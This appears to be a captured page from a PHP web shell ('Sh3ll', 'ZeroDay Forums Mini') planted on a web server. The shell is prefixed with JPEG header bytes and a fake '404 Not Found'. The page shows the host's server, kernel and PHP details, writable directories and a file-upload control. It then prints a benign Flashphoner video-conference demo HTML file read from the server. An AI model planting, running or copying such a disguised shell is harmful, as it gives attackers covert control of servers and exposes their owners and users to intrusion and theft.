����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/local/FlashphonerWebCallServer/client/examples/demo/conference/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/local/FlashphonerWebCallServer/client/examples/demo/conference/conference.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../dependencies/bootstrap/css/bootstrap.css">
    <link rel="stylesheet" href="conference.css">

    <title>Conference Room Minimal</title>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery-1.12.0.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery-ui.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery.websocket.js"></script>
    <script type="text/javascript" src="../../../dependencies/jquery/jquery.json.js"></script>
    <script type="text/javascript" src="../../../dependencies/js/utils.js"></script>
    <script type="text/javascript" src="../../../Flashphoner.js"></script>
    <script type="text/javascript" src="conference.js"></script>
    <!-- Bootstrap JS -->
    <script src="../../../dependencies/bootstrap/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container" id="roomChat">
    <div class="row">
        <div class="col-sm-12 text-center" style="max-width: 500px; height: 565px;">
            <h1>Conference Room Minimal</h1>
            <fieldset id="chatFieldSet" class="scheduler-border">
                <!-- Include from conference-fieldset.html by jquery. See js file. -->
            </fieldset>
            <div id="chatControls">
                <!-- Include from conference-controls.html by jquery. See js file. -->
            </div>
        </div>
        <div id="mobile">
            <!-- append spaces if mobile device detected -->
        </div>
        <div class="col-sm-12" style="width: 650px; height: 450px;">
            <div class="row">
                <div class="row-space">&nbsp</div>
                <div class="row-space">&nbsp</div>
                <div class="row-space">&nbsp</div>
                <div class="col-sm-4 participant free" style="margin-top: 10px">
                    <video id="remote-video-1" class="fp-videoFrameAlign" autoplay></video>
                    <div class="text-center text-info">
                        <span class="glyphicon fp-userState"></span>
                        <span class="p-login">Offline</span>
                    </div>
                </div>
                <div class="col-sm-4 participant free" style="margin-top: 10px">
                    <video id="remote-video-2" class="fp-videoFrameAlign" autoplay></video>
                    <div class="text-center text-info">
                        <span class="glyphicon fp-userState"></span>
                        <span class="p-login">Offline</span>
                    </div>
                </div>
                <div class="col-sm-4 participant free" style="margin-top: 10px">
                    <video id="remote-video-3" class="fp-videoFrameAlign" autoplay></video>
                    <div class="text-center text-info">
                        <span class="glyphicon fp-userState"></span>
                        <span class="p-login">Offline</span>
                    </div>
                </div>
                <div class="col-sm-4 participant free" style="margin-top: 10px">
                    <video id="remote-video-4" class="fp-videoFrameAlign" autoplay></video>
                    <div class="text-center text-info">
                        <span class="glyphicon fp-userState"></span>
                        <span class="p-login">Offline</span>
                    </div>
                </div>
                <div class="col-sm-4 participant free" style="margin-top: 10px">
                    <video id="remote-video-5" class="fp-videoFrameAlign" autoplay></video>
                    <div class="text-center text-info">
                        <span class="glyphicon fp-userState"></span>
                        <span class="p-login">Offline</span>
                    </div>
                </div>
                <div class="col-sm-12">
                    <div class="form-group">
                        <div id="chat" style="overflow-y: scroll; height: 100px;" class="text-left form-control"></div>
                    </div>
                </div>
                <div class="col-sm-12">
                    <div class="form-group">
                        <textarea id="message" class="form-control" rows="1" style="resize: none;"></textarea>
                    </div>
                </div>
                <div class="col-sm-5 col-sm-offset-7">
                    <div class="pull-right">
                        <button id="sendBtn" type="button" class="btn btn-default" onclick="sendMessage(); return false;">Send</button>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
</body>
</html>

ZeroDay Forums Mini